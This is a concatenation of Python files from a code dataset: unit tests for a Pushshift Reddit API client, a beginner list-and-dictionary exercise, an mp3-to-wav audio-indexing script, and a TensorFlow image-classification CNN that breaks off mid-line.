\"more_value\", \"filter\": \"created_utc\"}\n ),\n )\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._impose_rate_limit\")\n @mock.patch(\"pushshift_py.pushshift_api_minimal.requests.get\")\n def test_get(self, mock_get, mock_rate_limit):\n max_retries = 7\n expected_result = \"test_text\"\n test_url = \"example.com/route\"\n\n api = PushshiftAPIMinimal(\n max_retries=max_retries, rate_limit_per_minute=self._rate_limit\n )\n\n mock_get.return_value = MockResponse(\n status_code=200, text=json.dumps(expected_result)\n )\n\n self.assertEqual(expected_result, api._get(test_url))\n\n # Ensure the correct count of retries triggered\n mock_get.assert_called_with(test_url, params={})\n self.assertEqual(1, mock_get.call_count)\n\n # Ensure the rate limit was applied\n self.assertEqual(1, mock_rate_limit.call_count)\n mock_rate_limit.assert_has_calls([mock.call(0)])\n\n mock_get.return_value.raise_for_status.assert_called_once()\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._impose_rate_limit\")\n @mock.patch(\"pushshift_py.pushshift_api_minimal.requests.get\")\n def test_get_429(self, mock_get, mock_rate_limit):\n max_retries = 7\n expected_result = \"test_text\"\n test_url = \"example.com/route\"\n\n api = PushshiftAPIMinimal(\n max_retries=max_retries, rate_limit_per_minute=self._rate_limit\n )\n\n mock_get.return_value = MockResponse(\n status_code=429, text=json.dumps(expected_result)\n )\n\n 
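# A 429 is the one status the client swallows: _get retries up to\n        # max_retries and finally returns the parsed body instead of raising.\n        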
self.assertEqual(expected_result, api._get(test_url))\n\n # Ensure the correct count of retries triggered\n mock_get.assert_called_with(test_url, params={})\n self.assertEqual(max_retries, mock_get.call_count)\n\n # Ensure the rate limit was applied\n self.assertEqual(max_retries, mock_rate_limit.call_count)\n mock_rate_limit.assert_has_calls(\n [mock.call(idx) for idx in range(0, max_retries)]\n )\n\n # This is the key difference with code 429\n mock_get.return_value.raise_for_status.assert_not_called()\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._impose_rate_limit\")\n @mock.patch(\"pushshift_py.pushshift_api_minimal.requests.get\")\n def test_get_raise_for_status(self, mock_get, mock_rate_limit):\n max_retries = 7\n expected_result = \"test_text\"\n test_url = \"example.com/route\"\n\n api = PushshiftAPIMinimal(\n max_retries=max_retries, rate_limit_per_minute=self._rate_limit\n )\n\n # Test a subset of codes that should cause an outright failure\n for idx, status_code in enumerate(\n [400, 401, 403, 404, 405, 500, 502, 503, 504]\n ):\n mock_get.return_value = MockResponse(\n status_code=status_code, text=json.dumps(expected_result)\n )\n\n try:\n api._get(test_url)\n self.fail(\"call failed to trigger expected exception\")\n except HTTPError as exc:\n self.assertIn(\n \"{} {} Error\".format(\n status_code, \"Server\" if status_code >= 500 else \"Client\"\n ),\n str(exc),\n )\n\n expected_calls = max_retries * (idx + 1)\n\n # Ensure the correct count of retries triggered\n mock_get.assert_called_with(test_url, params={})\n self.assertEqual(expected_calls, mock_get.call_count)\n\n # Ensure the rate limit was applied\n self.assertEqual(expected_calls, mock_rate_limit.call_count)\n mock_rate_limit.assert_has_calls(\n [mock.call(idx) for idx in range(0, max_retries)]\n )\n\n mock_get.return_value.raise_for_status.assert_called_once()\n\n def test_apply_timestamp(self):\n api = PushshiftAPIMinimal(rate_limit_per_minute=self._rate_limit)\n\n api._last_timestamp = None\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\"}, api._apply_timestamp({\"rand_field\": \"rand_val\"})\n )\n\n api._last_timestamp = 12307501\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\", \"before\": 12307501},\n api._apply_timestamp({\"rand_field\": \"rand_val\"}),\n )\n\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\", \"sort\": \"desc\", \"before\": 12307501},\n api._apply_timestamp({\"rand_field\": \"rand_val\", \"sort\": \"desc\"}),\n )\n\n self.assertDictEqual(\n {\"rand_field\": \"rand_val\", \"sort\": \"asc\", \"after\": 12307501},\n api._apply_timestamp({\"rand_field\": \"rand_val\", \"sort\": \"asc\"}),\n )\n\n def test_raise_for_unpageable(self):\n max_results_per_request = 10\n valid_payloads = [\n {},\n {\"sort_type\": \"created_utc\"},\n {\"sort_type\": \"created_utc\", \"sort\": \"desc\"},\n {\"sort_type\": \"created_utc\", \"sort\": \"asc\"},\n {\"sort_type\": \"score\", \"sort\": \"desc\", \"limit\": 2},\n {\"sort_type\": \"num_comments\", \"sort\": \"asc\", \"limit\": 5},\n {\"sort_type\": \"whatever\", \"sort\": \"desc\", \"limit\": 8},\n {\"sort_type\": \"seriously_whatever\", \"sort\": \"desc\", \"limit\": 10},\n ]\n\n invalid_payloads = [\n {\"sort_type\": \"score\"},\n {\"sort_type\": \"num_comments\", \"sort\": \"desc\"},\n {\"sort_type\": \"whatever\", \"sort\": \"asc\"},\n {\"sort_type\": \"score\", \"sort\": \"desc\", \"limit\": 11},\n {\"sort_type\": \"num_comments\", \"sort\": \"asc\", \"limit\": 15},\n {\"sort_type\": \"whatever\", \"sort\": \"desc\", \"limit\": 
18},\n {\"sort_type\": \"seriously_whatever\", \"sort\": \"desc\", \"limit\": 110},\n ]\n\n api = PushshiftAPIMinimal(\n max_results_per_request=max_results_per_request,\n rate_limit_per_minute=self._rate_limit,\n )\n\n for payload in valid_payloads:\n # Everything should page fine\n api._raise_for_unpageable(payload)\n\n for payload in invalid_payloads:\n try:\n api._raise_for_unpageable(payload)\n self.fail(\"Expected exception failed to trigger\")\n except NotImplementedError as exc:\n msg = str(exc)\n # General error\n self.assertIn(PushshiftAPIMinimal._page_error_msg, msg)\n\n # Error specifics\n if \"limit\" in payload:\n self.assertIn(\n \"queries require limit <= max_results_per_request\", msg\n )\n else:\n self.assertIn(\"must provide a limit\", msg)\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_handle_paging_high_limit(self, mock_get):\n test_url = \"example.com/route\"\n test_data = [\n {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": 1530047819, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530048703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530049319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530049619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530049719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530049819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n {\n \"data\": [\n {\"created_utc\": 1530148703, \"id\": \"e1cdvn7\", \"score\": -1},\n {\"created_utc\": 1530149319, \"id\": \"e1cdvn8\", \"score\": -2},\n {\"created_utc\": 1530149619, \"id\": \"e1cdvn9\", \"score\": 3},\n {\"created_utc\": 1530149719, \"id\": \"e1cdvna\", \"score\": -5},\n {\"created_utc\": 1530149819, \"id\": \"e1cdvnb\", \"score\": -8},\n ]\n },\n ]\n mock_get.side_effect = test_data\n\n api = PushshiftAPIMinimal(\n max_results_per_request=10, rate_limit_per_minute=self._rate_limit\n )\n results = api._handle_paging(test_url, {\"limit\": 25})\n\n self.assertEqual(test_data[0], next(results))\n self.assertEqual(1530047819, api._last_timestamp)\n self.assertEqual(1, mock_get.call_count)\n mock_get.assert_called_with(test_url, {\"limit\": 10})\n\n self.assertEqual(test_data[1], next(results))\n self.assertEqual(1530049819, api._last_timestamp)\n self.assertEqual(2, mock_get.call_count)\n mock_get.assert_called_with(test_url, {\"limit\": 10, \"before\": 1530047819})\n\n self.assertEqual(test_data[2], next(results))\n self.assertEqual(1530149819, api._last_timestamp)\n self.assertEqual(3, mock_get.call_count)\n mock_get.assert_called_with(test_url, {\"limit\": 5, \"before\": 1530049819})\n\n try:\n next(results)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_handle_paging_low_limit(self, mock_get):\n expected_last_timestamp = 1530047819\n test_url = \"example.com/route\"\n mock_get.return_value = {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": expected_last_timestamp, \"id\": 
\"e1ccvnb\", \"score\": 8},\n ]\n }\n\n api = PushshiftAPIMinimal(\n max_results_per_request=10, rate_limit_per_minute=self._rate_limit\n )\n results = api._handle_paging(test_url, {\"limit\": 5})\n\n self.assertEqual(mock_get.return_value, next(results))\n self.assertEqual(expected_last_timestamp, api._last_timestamp)\n mock_get.assert_called_once_with(test_url, {\"limit\": 5})\n\n try:\n next(results)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._get\")\n def test_handle_paging_no_limit(self, mock_get):\n expected_last_timestamp = 1530047819\n test_url = \"example.com/route\"\n mock_get.return_value = {\n \"data\": [\n {\"created_utc\": 1530046703, \"id\": \"e1ccvn7\", \"score\": 1},\n {\"created_utc\": 1530047319, \"id\": \"e1ccvn8\", \"score\": 2},\n {\"created_utc\": 1530047619, \"id\": \"e1ccvn9\", \"score\": -3},\n {\"created_utc\": 1530047719, \"id\": \"e1ccvna\", \"score\": 5},\n {\"created_utc\": expected_last_timestamp, \"id\": \"e1ccvnb\", \"score\": 8},\n ]\n }\n\n api = PushshiftAPIMinimal(\n max_results_per_request=10, rate_limit_per_minute=self._rate_limit\n )\n results = api._handle_paging(test_url, {})\n\n # Run the first call outside of the loop.\n # The call values will vary slightly after the first call.\n self.assertEqual(mock_get.return_value, next(results))\n self.assertEqual(expected_last_timestamp, api._last_timestamp)\n mock_get.assert_called_once()\n mock_get.assert_called_with(test_url, {\"limit\": 10})\n\n # This could go on forever. We stop after 15 calls.\n for call_count in range(2, 15):\n self.assertEqual(mock_get.return_value, next(results))\n self.assertEqual(call_count, mock_get.call_count)\n self.assertEqual(expected_last_timestamp, api._last_timestamp)\n mock_get.assert_called_with(\n test_url, {\"limit\": 10, \"before\": expected_last_timestamp}\n )\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n def test_search(self, mock_paging):\n mock_paging.return_value = self._search_test_data\n\n kind = \"TestKind\"\n expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n api = PushshiftAPIMinimal(\n domain=\"test-domain\",\n rate_limit_per_minute=self._rate_limit,\n detect_local_tz=False,\n )\n\n result_gen = api._search(kind)\n\n for data_grp in self._search_test_data:\n for test_item in data_grp[\"data\"]:\n actual_item = next(result_gen)\n\n self.assertIn(kind, str(actual_item))\n self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n self.assertDictEqual(test_item, actual_item.d_)\n\n for key, val in test_item.items():\n self.assertEqual(val, getattr(actual_item, key))\n\n mock_paging.assert_called_once_with(expected_url, {})\n\n # Make sure everything is complete\n try:\n next(result_gen)\n self.fail(\"Expected StopIteration\")\n except StopIteration:\n pass\n\n @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n def test_search_batch(self, mock_paging):\n mock_paging.return_value = self._search_test_data\n\n kind = \"TestKind\"\n expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n api = PushshiftAPIMinimal(\n domain=\"test-domain\",\n rate_limit_per_minute=self._rate_limit,\n detect_local_tz=False,\n )\n\n result_gen = api._search(kind, return_batch=True)\n\n for data_grp in self._search_test_data:\n expected_batch = data_grp[\"data\"]\n actual_batch = next(result_gen)\n\n self.assertEqual(len(expected_batch), len(actual_batch))\n\n for idx, test_item in 
enumerate(expected_batch):\n                actual_item = actual_batch[idx]\n\n                self.assertIn(kind, str(actual_item))\n                self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n                self.assertDictEqual(test_item, actual_item.d_)\n\n                for key, val in test_item.items():\n                    self.assertEqual(val, getattr(actual_item, key))\n\n        mock_paging.assert_called_once_with(expected_url, {})\n\n        # Make sure everything is complete\n        try:\n            next(result_gen)\n            self.fail(\"Expected StopIteration\")\n        except StopIteration:\n            pass\n\n    @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n    def test_search_stop_condition(self, mock_paging):\n        mock_paging.return_value = self._search_test_data\n\n        kind = \"TestKind\"\n        expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n        api = PushshiftAPIMinimal(\n            domain=\"test-domain\",\n            rate_limit_per_minute=self._rate_limit,\n            detect_local_tz=False,\n        )\n\n        result_gen = api._search(kind, stop_condition=lambda x: x.created > 1530049619)\n\n        for data_grp in self._search_test_data:\n            for test_item in data_grp[\"data\"]:\n                if test_item[\"created_utc\"] > 1530049619:\n                    break\n\n                actual_item = next(result_gen)\n\n                self.assertIn(kind, str(actual_item))\n                self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n                self.assertDictEqual(test_item, actual_item.d_)\n\n                for key, val in test_item.items():\n                    self.assertEqual(val, getattr(actual_item, key))\n\n        mock_paging.assert_called_once_with(expected_url, {})\n\n        # Make sure everything is complete\n        try:\n            next(result_gen)\n            self.fail(\"Expected StopIteration\")\n        except StopIteration:\n            pass\n\n    @mock.patch(\"pushshift_py.PushshiftAPIMinimal._handle_paging\")\n    def test_search_stop_cond_batch(self, mock_paging):\n        mock_paging.return_value = self._search_test_data\n\n        kind = \"TestKind\"\n        expected_url = \"https://test-domain.pushshift.io/reddit/{}/search\".format(kind)\n        api = PushshiftAPIMinimal(\n            domain=\"test-domain\",\n            rate_limit_per_minute=self._rate_limit,\n            detect_local_tz=False,\n        )\n\n        result_gen = api._search(\n            kind, stop_condition=lambda x: x.created > 1530049619, return_batch=True\n        )\n\n        for data_grp in self._search_test_data:\n            # Transform our source data to match what we expect with the stop condition\n            expected_batch = list(\n                filter(lambda x: x[\"created_utc\"] <= 1530049619, data_grp[\"data\"])\n            )\n            actual_batch = next(result_gen)\n\n            self.assertEqual(len(expected_batch), len(actual_batch))\n\n            for idx, test_item in enumerate(expected_batch):\n                actual_item = actual_batch[idx]\n\n                self.assertIn(kind, str(actual_item))\n                self.assertEqual(test_item[\"created_utc\"], actual_item.created)\n                self.assertDictEqual(test_item, actual_item.d_)\n\n                for key, val in test_item.items():\n                    self.assertEqual(val, getattr(actual_item, key))\n\n            # Indicates that we hit the stop condition\n            if len(expected_batch) < len(data_grp[\"data\"]):\n                break\n\n        mock_paging.assert_called_once_with(expected_url, {})\n\n        # Make sure everything is complete\n        try:\n            next(result_gen)\n            self.fail(\"Expected StopIteration\")\n        except StopIteration:\n            pass\n","sub_path":"tests/test_pushshift_api_minimal.py","file_name":"test_pushshift_api_minimal.py","file_ext":"py","file_size_in_byte":28983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"9884714","text":"# -*- coding: utf-8 -*-\n\n# 3.1 year_lists\nyear_lists = ['1980', '1981', '1982', '1983', '1984']\n\n# 3.2 the third birthday\nprint(year_lists[3])\n\n# 3.3 the year they were oldest\nprint(year_lists[0])\n\n# 3.4 things\nthings = 
['mozzarella', 'cinderella', 'salmonella']\n\n# 3.5 capitalize the person's name and print it\ntempStr = ','.join(things)\nprint(tempStr.capitalize())\n\n# 3.6 uppercase the cheese element\nprint(tempStr.title())\n\n# 3.8 the surprise list\nsurprise = ['Groucho', 'Chico', 'Harpo']\n# 3.9 lowercase the last element of the list, reverse it, then capitalize it\n\nprint(surprise[2].lower()[::-1].capitalize())\n# 3.10 the f2e dictionary\nf2e = {\n    'dog': 'chien',\n    'cat': 'chat',\n    'walrus': 'morse'\n}\n# print the French word for the English word walrus\nprint(f2e['walrus'])\n# build the reverse (English-to-French) dictionary\ne2f = {}\nfor key, value in f2e.items():\n    e2f[value] = key\nprint(e2f)","sub_path":"chapter03/practice3.py","file_name":"practice3.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"382647473","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 19 13:24:24 2021\n\n@author: Adi\n\"\"\"\nimport numpy as np\nimport os\nimport librosa\nimport re\nimport subprocess\nimport pandas as pd\nfrom tinytag import TinyTag\nimport sound_similarity\n\ndef fix_string(st_in):\n    # only lower case\n    st0 = st_in.lower()  # casefold() ?\n    st1 = re.sub(\"[^0-9a-zA-Z,' ']\", \"\", st0)\n    no_good_string = [' hd', 'hd ', 'official music video', 'official', 'video']\n    for bad in no_good_string:\n        st1 = st1.replace(bad, '')\n    st2 = st1\n    st2 = st2.replace(\",\", \"\")\n    st2 = st2.replace(\".\", \"\")\n    st2 = st2.replace(\"'\", \"\")\n    # collapse any run of spaces down to a single space\n    while '  ' in st2:\n        st2 = st2.replace(\"  \", \" \")\n\n    if len(st2) < 2:  # not english\n        st22 = st0\n        st22 = st22.replace(\"-\", \"\")\n        st22 = st22.replace(\":\", \"\")\n        st22 = st22.replace(\"@\", \"\")\n        st22 = st22.replace(\"#\", \"\")\n        st22 = st22.replace(\",\", \"\")\n        st22 = st22.replace(\".\", \"\")\n        st22 = st22.replace(\"'\", \"\")\n\n        while '  ' in st22:\n            st22 = st22.replace(\"  \", \" \")\n        st2 = st22\n\n    # trim trailing spaces (guard against an empty string)\n    while st2 and st2[-1] == ' ':\n        st2 = st2[:-1]\n\n    # replace space with '_'\n    st3 = st2.replace(\"_\", \"\")  # to prevent double '_'\n    st3 = st3.replace(\" \", \"_\")\n\n    return st3\n\ndef fft_np(sig, sr):\n    # single-sided FFT magnitude plus the matching frequency axis\n    n = len(sig)\n    freq = np.fft.rfftfreq(n, d=1/sr)\n    out = np.abs(np.fft.rfft(sig)/n)\n    return out, freq\n\ndef restart_index_sound_data(path):\n    columns_name = ['name',\n                    'old_name',\n                    'len[sec]',\n                    'number of bit',\n                    'bit for sec',\n                    'artist',\n                    'title',\n                    'albume',\n                    'path_wav',\n                    'path_sound_np',\n                    'no missing data']\n\n    index_data = pd.DataFrame(columns=columns_name).set_index('name')\n    index_data.to_csv(path)\n\ndef new_sound_data(name, old_name, path):\n    df1 = pd.read_csv(path).set_index('name')\n    if name in df1.index:\n        print('song name is in data frame')\n        return True, df1\n    df2 = pd.DataFrame([[name, old_name, False]], columns=['name', 'old_name', 'no missing data']).set_index('name')\n    df1 = df1.append(df2)\n    df1.to_csv(path)\n    return False, df1\n\nmain_phath = r'D:\github\video_to_sound\video_to_sound'\n\n# path for file\nphath_to_index_sound_data = main_phath+r'\data\data_sound_sim\index_sound_data.csv'\n\n# path for folder\nphath_for_mp3_sound = main_phath+r'\data\data_sound_sim\mp3_sound2'\nphath_for_wav_sound = main_phath+r'\data\data_sound_sim\wav_sound2'\nphath_for_np_sound = main_phath+r'\data\data_sound_sim\np_sound2'\n\n\n# parameters for processing\n\n\nmp3_file = os.listdir(phath_for_mp3_sound)\n\n# the folder listing above is overridden by the song names from the index CSV\nmp3_file = pd.read_csv(phath_to_index_sound_data)['name'].tolist()\n\nfor file_name in mp3_file:  # loop over the songs in the index\n    # clean the song name, e.g. 'Brit go H;Ome' => 'brit_go_home'\n    print('------')\n    
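# fix_string (currently bypassed just below) would map e.g.\n    # 'Hey, Jude (Official Video)' -> 'hey_jude' via the rubbish-word list above\n    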
print(file_name[:-4])\n    #file_name_r = fix_string(file_name[:-4])\n    file_name_r = file_name\n    print(file_name_r)\n    print('-------new song:', file_name_r)\n    # load index_data (pandas dataframe) and try to add the new song name\n\n    sound_mp3_phath = phath_for_mp3_sound+'\\\\'+file_name\n    print('sound_mp3_phath', sound_mp3_phath)\n\n    flag_name, data_index = new_sound_data(file_name_r, file_name[:-4], phath_to_index_sound_data)\n    if flag_name and data_index.at[file_name_r, 'no missing data']:  # if name in data, move to next song\n        print('song in data, no missing data, move to next song')\n        os.remove(sound_mp3_phath)\n        continue\n\n    # all name+path of new file\n\n    sound_wav_phath = phath_for_wav_sound+'\\\\'+file_name_r+'.wav'\n    print('sound_wav_phath', sound_wav_phath)\n    sound_np_phath = phath_for_np_sound+'\\\\'+file_name_r+'.npy'\n    print('sound_np_phath', sound_np_phath)\n    print('--------------------start---------------')\n    # test if wav in folder\n    if (file_name_r+'.wav') not in os.listdir(phath_for_wav_sound):\n        print('no wav file')\n        try:\n            print(sound_mp3_phath)\n            print(sound_wav_phath)\n            temp_proc = subprocess.call(['ffmpeg', '-i', sound_mp3_phath, sound_wav_phath], shell=True)\n            print('convert mp3 to wav')\n        except Exception:\n            print('error converting mp3 to wav')\n            continue\n\n    # parameters for converting wav to vector\n    sampling_rate = 32768  # [Hz] 2^15\n\n    # test if np sound in folder\n    if (file_name_r+'.npy') not in os.listdir(phath_for_np_sound):\n        print('no numpy sound file in folder')\n        print(sound_wav_phath)\n        (sig, rate) = librosa.load(sound_wav_phath, sr=sampling_rate)\n        np.save(sound_np_phath, sig)\n        print('convert wav file to numpy')\n\n    else:\n        print('numpy sound file exists')\n        rate = sampling_rate\n        sig = np.load(sound_np_phath)\n\n    #tag = TinyTag.get(sound_mp3_phath)\n\n    #data_index.at[file_name_r,'number of bit'] = len(sig)\n    #data_index.at[file_name_r,'len[sec]'] = tag.duration\n    #data_index.at[file_name_r,'bit for sec'] = len(sig)/data_index.at[file_name_r,'len[sec]']\n    #try :\n        #data_index.at[file_name_r,'artist'] = fix_string(tag.artist)\n        #data_index.at[file_name_r,'title'] = fix_string(tag.title)\n        #data_index.at[file_name_r,'albume'] = fix_string(tag.album)\n\n    #except:\n        #pass\n\n    #data_index.at[file_name_r,'path_sound_np'] = sound_np_phath\n    #data_index.at[file_name_r,'path_wav'] = sound_wav_phath\n    print('1')\n    grid = 180\n    if data_index.at[file_name_r, 'len[sec]'] > 180:\n        print('2')\n        # crop longer songs down to the first 180 seconds worth of samples\n        len_to_index = int(data_index.at[file_name_r, 'number of bit']*(180/data_index.at[file_name_r, 'len[sec]']))\n        sig1 = sig[:len_to_index]\n\n    else:\n        print('1')\n        # assumption: shorter songs are zero-padded out to the full 180-second grid\n        sig1 = np.zeros(int(data_index.at[file_name_r, 'bit for sec']*180))\n        sig1[:int(data_index.at[file_name_r, 'number of bit'])] = sig\n\n    print('2')\n    p1 = int((0.3*data_index.at[file_name_r, 'number of bit'])//grid)\n    print('3')\n    v1 = sound_similarity.crop_sig_mean(sig1, p=p1, grid=grid, padding=0)\n    print('4')\n    #print(v2)\n    index1 = sound_similarity.sig_dist_full(v1)\n    print('5')\n    data_index.at[file_name_r, 'index3min'] = v1\n    print('1')\n    data_index.at[file_name_r, 'no missing data'] = True\n    print('1')\n    data_index.to_csv(phath_to_index_sound_data)\n    print('1')\n    os.remove(sound_mp3_phath)\n","sub_path":"convert_mp3_to_wav.py","file_name":"convert_mp3_to_wav.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"28046957","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nimport csv\n\n
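# serving_input_receiver_fn below is the serve-time entry point: it takes a\n# serialized tf.Example handed in as \"predictor_inputs\" and parses it into\n# the \"x\" feature tensor the estimator graph expects.\n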
# Helpful Resources:\n# https://stackoverflow.com/questions/49698567/how-to-save-tensorflow-model-using-estimator-export-savemodel/49805051\ndef serving_input_receiver_fn():\n    serialized_tf_example = tf.placeholder(dtype=tf.string, name=\"input_tensors\")\n    receiver_tensors = {\"predictor_inputs\": serialized_tf_example}\n    feature_spec = {'x': tf.FixedLenSequenceFeature(shape=[150, 150, 3], dtype=tf.float32, allow_missing=True)}\n    test_features = tf.parse_example(serialized_tf_example, feature_spec)\n    return tf.estimator.export.ServingInputReceiver(test_features, receiver_tensors)\n\ndef cnn_model_fn(features, labels, mode):\n    \"\"\"\n    Model function for CNN.\n    \"\"\"\n    features = features[list(features.keys())[0]]\n\n    # NOTE: only uncomment and use this if saving the entire model AFTER training\n    # TODO: figure out the proper way to do this\n    print(features)\n    features = tf.reshape(features, [-1, 150, 150, 3])\n    print(features)\n\n    # Feature Extractor:\n    # ---------------------------------------------------------------------------------------------------------\n    # Convolutional Layer #1\n    # 15x15 kernel, 50 filters\n    # Input: [batch_size, 150, 150, 3]\n    # Output: [batch_size, 136, 136, 50]\n    # https://www.quora.com/How-can-I-calculate-the-size-of-output-of-convolutional-layer\n    conv1 = tf.layers.conv2d(\n        inputs=features,\n        filters=50,\n        kernel_size=[15, 15],\n        padding=\"valid\",\n        activation=tf.nn.relu)\n\n    # Pooling Layer #1\n    # 4x4 pool, stride size of 2\n    # Input: [batch_size, 136, 136, 50]\n    # Output: [batch_size, 67, 67, 50]\n    # *see above ^\n    pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[4, 4], strides=2)\n\n    # Convolutional Layer #2\n    # 5x5 kernel, 75 filters\n    # Input: [batch_size, 67, 67, 50]\n    # Output: [batch_size, 63, 63, 75]\n    conv2 = tf.layers.conv2d(\n        inputs=pool1,\n        filters=75,\n        kernel_size=[5, 5],\n        padding=\"valid\",\n        activation=tf.nn.relu)\n\n    # Pooling Layer #2\n    # 3x3 pool, stride size of 2\n    # Input: [batch_size, 63, 63, 75]\n    # Output: [batch_size, 31, 31, 75]\n    pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[3, 3], strides=2)\n\n    # Convolutional Layer #3\n    # 3x3 kernel, 100 filters\n    # Input: [batch_size, 31, 31, 75]\n    # Output: [batch_size, 29, 29, 100]\n    conv3 = tf.layers.conv2d(\n        inputs=pool2,\n        filters=100,\n        kernel_size=[3, 3],\n        padding=\"valid\",\n        activation=tf.nn.relu)\n\n    # Pooling Layer #3\n    # 3x3 pool, stride size of 2\n    # Input: [batch_size, 29, 29, 100]\n    # Output: [batch_size, 14, 14, 100]\n    pool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[3, 3], strides=2)\n\n    # Convolutional Layer #4\n    # 3x3 kernel, 150 filters\n    # Input: [batch_size, 14, 14, 100]\n    # Output: [batch_size, 12, 12, 150]\n    conv4 = tf.layers.conv2d(\n        inputs=pool3,\n        filters=150,\n        kernel_size=[3, 3],\n        padding=\"valid\",\n        activation=tf.nn.relu)\n\n    # Pooling Layer #4\n    # 2x2 pool, stride size of 2\n    # Input: [batch_size, 12, 12, 150]\n    # Output: [batch_size, 6, 6, 150]\n    pool4 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2)\n\n    # Determination:\n    # ---------------------------------------------------------------------------------------------------------\n    # Flatten tensor into a batch of vectors\n    # Input Tensor Shape: [batch_size, 6, 6, 150]\n    # Output Tensor Shape: [batch_size, 6 * 6 * 150]\n    pool4_flat = tf.reshape(pool4, [-1, 6 * 6 * 150])\n\n    # Dense Layer\n    # Input Tensor Shape: [batch_size, 6 * 6 * 150]\n    # Output Tensor Shape: [batch_size, 1024]\n    dense = tf.layers.dense(inputs=pool4_flat, units=1024, activation=tf.nn.relu)\n\n    # Add dropout operation; 0.6 
probability that element will be kept\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits layer\n # Input Tensor Shape: [batch_size, 1024]\n # Output Tensor Shape: [batch_size, 2]\n logits = tf.layers.dense(inputs=dropout, units=2)\n\n # Results:\n # ---------------------------------------------------------------------------------------------------------\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n export_outputs = {'predict_output': tf.estimator.export.PredictOutput(predictions)}\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions, export_outputs=export_outputs)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n print(\"features: \")\n print(type(features))\n print(features)\n print(\"labels: \")\n print(labels.dtype)\n print(labels.get_shape().as_list())\n print(\"logits layer: \")\n print(logits.dtype)\n print(logits.get_shape().as_list())\n print(\"loss layer: \")\n print(loss.dtype)\n print(loss.get_shape().as_list())\n\n # DEBUG\n #exit()\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.0001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\ndef main(unused_argv):\n # Load training and testing data\n train_data = np.zeros(shape=(1000, 150, 150, 3))\n train_labels = np.zeros(shape=(1000))\n test_data = np.zeros(shape=(50, 150, 150, 3))\n test_labels = np.zeros(shape=(50))\n train_directory = \"./temp_data/alex-training-data\"\n train_labels_file = \"./temp_data/train-labels.csv\"\n test_directory = \"./temp_data/alex-testing-data\"\n test_labels_file = \"./temp_data/test-labels.csv\"\n for idx, img in enumerate(os.listdir(train_directory)):\n loaded_img = cv2.imread(train_directory + '/' + img)\n resized_img = 